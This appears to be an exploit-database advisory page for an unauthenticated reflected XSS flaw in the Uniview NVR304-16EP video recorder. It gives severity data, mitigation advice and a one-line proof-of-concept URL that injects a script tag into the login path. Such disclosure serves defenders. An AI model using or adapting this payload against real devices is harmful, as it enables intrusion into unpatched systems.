header-logo
Suggest Exploit
vendor:
NVR304-S-P
by:
Luis Martinez
4.3
CVSS
MEDIUM
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: NVR304-S-P
Affected Version From: NVR304-16EP
Affected Version To: NVR304-16EP
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
2022

Network Video Recorder NVR304-16EP – Reflected Cross-Site Scripting (XSS) (Unauthenticated)

A reflected cross-site scripting (XSS) vulnerability exists in Network Video Recorder NVR304-16EP, which allows an unauthenticated attacker to inject arbitrary web script or HTML via the 'LAPI/V1.0/System/Security/Login/' parameter.

Mitigation:

Input validation should be used to prevent XSS attacks. Sanitize user input and output to prevent malicious code from being executed.
Source

Exploit-DB raw data:

# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Author: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
# Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
# Tested Version: NVR304-16EP
# Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A

# Proof of Concept:

http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>

Navigation

Suggest Exploit

Services By CQR